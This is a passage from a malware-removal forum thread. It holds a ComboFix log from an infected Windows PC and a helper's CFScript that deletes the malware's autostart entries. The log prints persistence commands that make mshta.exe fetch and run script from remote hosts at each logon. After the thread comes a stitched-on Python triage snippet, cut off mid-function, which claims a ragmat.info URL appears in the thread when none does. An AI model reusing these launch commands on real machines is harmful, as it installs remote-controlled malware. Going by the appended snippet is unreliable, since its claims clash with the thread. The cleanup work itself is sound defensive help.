2012-05-14 22:57 . 2012-02-01 15:10	1404928	----a-w-	c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
2012-05-14 22:57 . 2012-02-01 15:10	936960	----a-w-	c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2012-05-14 22:57 . 2012-02-29 13:41	1069056	----a-w-	c:\windows\system32\DWrite.dll
2012-05-14 22:57 . 2012-03-01 14:46	219648	----a-w-	c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57 . 2012-02-29 14:08	1172480	----a-w-	c:\windows\system32\d3d10warp.dll
2012-05-14 22:57 . 2012-03-01 14:46	160768	----a-w-	c:\windows\system32\d3d10_1.dll
2012-05-14 22:57 . 2012-02-29 13:44	683008	----a-w-	c:\windows\system32\d2d1.dll
2012-05-14 22:56 . 2012-04-03 08:16	3550080	----a-w-	c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56 . 2012-04-03 08:16	3602816	----a-w-	c:\windows\system32\ntkrnlpa.exe
2012-05-14 22:56 . 2012-04-02 13:36	2044928	----a-w-	c:\windows\system32\win32k.sys
2012-05-09 04:58 . 2012-05-09 04:58	592824	----a-w-	c:\program files\Mozilla Firefox\gkmedias.dll
2012-05-09 04:58 . 2012-05-09 04:58	44472	----a-w-	c:\program files\Mozilla Firefox\mozglue.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-05-05 06:08 . 2012-04-07 05:22	419488	----a-w-	c:\windows\system32\FlashPlayerApp.exe
2012-05-05 06:08 . 2011-06-14 22:11	70304	----a-w-	c:\windows\system32\FlashPlayerCPLApp.cpl
2012-04-04 19:56 . 2010-02-20 07:40	22344	----a-w-	c:\windows\system32\drivers\mbam.sys
2012-03-21 00:44 . 2012-03-21 00:44	74112	----a-w-	c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44 . 2012-03-21 00:44	171064	----a-w-	c:\windows\system32\drivers\MpFilter.sys
2012-02-29 15:11 . 2012-04-14 06:43	5120	----a-w-	c:\windows\system32\wmi.dll
2012-02-29 15:11 . 2012-04-14 06:43	172032	----a-w-	c:\windows\system32\wintrust.dll
2012-02-29 15:09 . 2012-04-14 06:43	157696	----a-w-	c:\windows\system32\imagehlp.dll
2012-02-29 13:32 . 2012-04-14 06:43	12800	----a-w-	c:\windows\system32\drivers\fs_rec.sys
2012-05-09 04:58 . 2011-06-08 03:45	97208	----a-w-	c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
2011-05-09 08:49	176936	----a-w-	c:\program files\uTorrentControl\prxtbuTor.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1" [?]
"RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP" [?]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
"Skytel"="Skytel.exe" [2007-05-29 1826816]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
"00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
"DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Metacafe.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
backup=c:\windows\pss\Metacafe.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
backup=c:\windows\pss\Microsoft Office.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^Users^GAGAN^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
path=c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
mshta.exe http://mistymodel.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
mshta.exe http://mistymodel.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1 [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HWSetup]
\HWSetup.exe hwSetUP [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\webvsint]
mshta [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
2011-12-13 04:20	3305760	----a-w-	c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2012-02-21 01:28	59240	----a-w-	c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Camera Assistant Software]
2007-04-10 23:40	413696	----a-w-	c:\program files\Camera Assistant Software for Toshiba\traybar.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtamon]
2010-02-10 12:39	16040	----a-w-	c:\program files\Dell V305\dldtamon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtmon.exe]
2010-02-10 12:39	672424	----a-w-	c:\program files\Dell V305\dldtmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EPSON WorkForce 30 Series]
2007-11-26 21:00	188928	----a-w-	c:\windows\System32\spool\drivers\w32x86\3\E_FATIEEA.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\googletalk]
2007-01-01 21:22	3739648	----a-w-	c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HSON]
2006-12-07 23:49	55416	----a-w-	c:\program files\Toshiba\TBS\HSON.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2012-03-27 09:09	421736	----a-w-	c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KeNotify]
2006-11-07 00:14	34352	----a-w-	c:\program files\Toshiba\Utilities\KeNotify.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NBAgent]
2009-06-18 07:08	1062184	----a-w-	c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Pando Media Booster]
2009-02-27 06:22	2785608	----a-w-	c:\program files\Pando Networks\Media Booster\PMB.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2011-10-24 19:28	421888	----a-w-	c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RtHDVCpl]
2007-06-13 17:11	4489216	----a-w-	c:\windows\RtHDVCpl.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skytel]
2007-05-29 00:39	1826816	----a-w-	c:\windows\SkyTel.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SmoothView]
2007-03-22 18:46	448632	----a-w-	c:\program files\Toshiba\SmoothView\SmoothView.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Speech Recognition]
2008-01-19 07:33	49664	----a-w-	c:\windows\Speech\Common\sapisvr.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
2006-11-10 16:35	90112	----a-w-	c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SVPWUTIL]
2006-03-23 04:42	438272	----a-w-	c:\program files\Toshiba\Utilities\SVPWUTIL.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
2009-03-20 11:36	1451304	----a-w-	c:\program files\Synaptics\SynTP\SynTPEnh.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPwrMain]
2007-03-29 17:39	411192	----a-w-	c:\program files\Toshiba\Power Saver\TPwrMain.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VeohPlugin]
2011-06-30 10:11	2648184	----a-w-	c:\program files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring"=dword:00000001
.
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceAndNoImpersonation	REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2012-05-28 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
.
2012-05-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2012-05-29 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
- c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://search.imesh.com/
mStart Page = hxxp://home.sweetim.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
LSP: c:\windows\system32\wpclsp.dll
TCP: DhcpNameServer = 192.168.1.1
FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
.
- - - - ORPHANS REMOVED - - - -
.
WebBrowser-{EEE6C35B-6118-11DC-9C72-001320C79847} - (no file)
WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
MSConfigStartUp-BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA} - c:\program files\Common Files\Nero\Lib\NMBgMonitor.exe
MSConfigStartUp-CTFMon - c:\windows\system32\CTF\ctfmon.exe
MSConfigStartUp-fcconf - c:\users\GAGAN\AppData\Local\Temp\dns-hone.dll
MSConfigStartUp-InCD - c:\program files\Nero\Nero8\InCD\InCD.exe
MSConfigStartUp-NDSTray - NDSTray.exe
MSConfigStartUp-NeroFilterCheck - c:\program files\Common Files\Nero\Lib\NeroCheck.exe
MSConfigStartUp-SecurDisc - c:\program files\Nero\Nero8\InCD\NBHGui.exe
MSConfigStartUp-SiteAdvisor - c:\program files\SiteAdvisor\6172\SiteAdv.exe
MSConfigStartUp-Swusukukasega - c:\users\GAGAN\AppData\Local\ocopodatodejex.dll
MSConfigStartUp-TkBellExe - c:\program files\Common Files\Real\Update_OB\realsched.exe
MSConfigStartUp-YSearchProtection - c:\program files\Yahoo!\Search Protection\SearchProtection.exe
AddRemove-Akamai - c:\program files\common files\akamai\uninstall.exe
AddRemove-WinImage - c:\users\GAGAN\Desktop\winima81\winimage.exe
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2012-05-28 22:49
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ... 
.
scanning hidden autostart entries ... 
.
scanning hidden files ... 
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ogg\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pcm\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pls\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.spx\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
@Denied: (Read) (RestrictedCode)
@Denied: (Read) (LocalSystem)
@Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Read) (Administrators)
@SACL=(02 0001)
@Ace=(0x11) (1) (S-1-16-4096)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
@SACL=(02 0001)
"lastact"=dword:00003640
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHistory]
@SACL=(02 0001)
"srch_ebox"=dword:4785b178
"srch_hlt"=dword:47854ece
"clkstrm"=dword:4785b2dc
"boo"=dword:4785b2dc
"etpg70_21"=dword:47854ece
"sst"=dword:47854ecf
"mess"=dword:4785b2dc
"mess_off"=dword:4785b2dc
"yma"=dword:47854eda
"mus"=dword:47854edb
"wik"=dword:47854edb
"vis_srch70"=dword:4785abea
"cacheldr"=dword:4785b2dc
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistory]
@SACL=(02 0001)
"srch"=dword:4785abec
"vis_srch70"=dword:4785abec
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
@SACL=(02 0001)
"LastPoll_200"=dword:00041537
"resfeed"=dword:00000002
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
"InstallStarted"=dword:00000000
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
"DisplayName"="jlGui 3.0"
"DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\57\\573addb9-2492e35c.ico"
"NoModify"=dword:00000001
"NoRepair"=dword:00000001
"Publisher"="Music Player for the Java(tm) Platform"
"Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
"URLInfoAbout"="http://www.javazoom.net"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"bgu0fw0tDZx8jtqEjccbDg==
"=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,
96
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta]
@Denied: (Full) (Administrators)
@Denied: (Full) (Owner)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (Administrators)
@Denied: (Full) (Users)
@SACL=
"PerceivedType"="text"
@="htafile"
"Content Type"="application/hta"
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
@="{eec97550-47a9-11cf-b952-00aa0051fe20}"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
Completion time: 2012-05-28 22:55:51
ComboFix-quarantined-files.txt 2012-05-29 02:55
.
Pre-Run: 28,398,157,824 bytes free
Post-Run: 28,481,286,144 bytes free
.
- - End Of File - - 81C424733602C9A0DE9C0999B8DD65AF


----------



## gagraptor (May 23, 2012)

Torrents not in use.


----------



## gagraptor (May 23, 2012)

The problem seems partially solved. Now I have blank windows popping up. It has a web address in the top: Http://silentmode.net/reg2php?cccid=irfzxjvu2w6rbs0ht6u6qncccsjqkmcp


----------



## gagraptor (May 23, 2012)

I guess it's not. It's back again.


----------



## Mark1956 (May 7, 2011)

No surprise with that. I was not sure if Combofix would clear the problem, but it has given more information to work from; this fix should clear it. There will be a few more things to do once the problem of the popups has gone, so please stick with me until I say we are done.

We are now going to run ComboFix a different way.
Open Notepad by clicking on [image] and in the *Search* box type: *Notepad.exe* and hit *Enter*.
Copy and paste everything in the *code box* below into it.
_-- Note: Make sure Word Wrap is *unchecked* in Notepad by clicking on *Format* in the top menu._

```
Killall::
Registry::
[-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
[-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
[-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\webvsint]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"=-
"RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"=-
Reboot::
```

Save the file as *CFScript.txt* by choosing _Save As..._ in the File Menu, and save it to your Desktop where the ComboFix icon is also located.
Close your browser and* disconnect* from the Internet.
Now use your mouse to *drag*, then *drop* the CFScript.txt file on top of ComboFix.exe as seen in the image below.
[image]
This will start ComboFix again and launch the script.
ComboFix may reboot your system when it finishes. This is normal.
A log will be created just as before and saved to C:\ComboFix.txt. Please copy and paste the contents of *ComboFix.txt* in your next reply.
Be sure to *re-enable* your anti-virus and other security programs *after* the scan is complete.
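The CFScript above removes two HKCU Run values that start mshta.exe with a remote URL, which is the whole persistence mechanism behind this popup: a signed Windows binary pulling its script from a web server every logon. As an added example (not part of this thread or of ComboFix), here is a small Python triage script that reads Run-key entries in the format ComboFix prints them and flags the pattern a responder should look for: a script host such as mshta.exe launched with a URL or inline script, and machine-generated-looking value names. The sample dump is constructed; the two value names and the ragmat.info URL are the ones seen in this thread, while the command behind the RegWrite value is a hypothetical stand-in because the thread does not show what it contained.

```python
"""Triage autostart (Run key) entries for script-host launchers such as mshta.exe.

Added example for the thread above; the registry dump below is constructed to
look like ComboFix's "Reg Loading Points" output and is not a real log.
"""
import re
from urllib.parse import urlparse

# Signed Windows binaries routinely abused to run remote or inline script.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe",
                "regsvr32.exe", "powershell.exe"}

URL_RE = re.compile(r"""(?i)\b(?:https?|ftp)://[^\s"']+""")   # remote content
INLINE_RE = re.compile(r"(?i)\b(?:javascript|vbscript|about):")  # inline script
KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
# "Name"="command" with ComboFix's optional trailing "[date size]" annotation.
ENTRY_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<cmd>.*?)"(?:\s+\[[^\]]*\])?\s*$')

# Constructed sample: the RegWrite command is a hypothetical stand-in.
SAMPLE_DUMP = r'''
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
"SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="c:\windows\system32\mshta.exe http://ragmat.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"
"RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe javascript:window.close()"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
'''


def parse_run_entries(text):
    """Yield (key, value_name, command) tuples from a REGEDIT4-style dump."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        m = ENTRY_RE.match(line)
        if m and key:
            yield key, m.group("name"), m.group("cmd")


def image_name(command):
    """Lower-cased basename of the executable at the start of a command line."""
    cmd = command.strip()
    if cmd.startswith('"'):                       # quoted path
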